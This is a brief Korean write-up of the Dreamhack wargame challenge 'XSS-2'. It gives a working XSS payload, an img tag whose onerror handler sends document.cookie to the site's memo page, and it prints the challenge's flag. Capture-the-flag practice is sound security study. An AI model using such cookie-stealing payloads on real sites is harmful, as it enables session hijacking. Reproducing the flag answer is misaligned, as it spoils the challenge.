드림핵: XSS-2 https://dreamhack.io/wargame/challenges/268
vuln.html에서 발생하는 취약점을 통해 이용자의 쿠키를 탈취해야 한다.
아래의 익스플로잇 코드를 flag에 입력한 후
<img src="XSS-2" onerror="location.href='/memo?memo='+document.cookie">
memo에 들어가면 flag를 확인할 수 있다.
DH{3c01577e9542ec24d68ba0ffb846508f}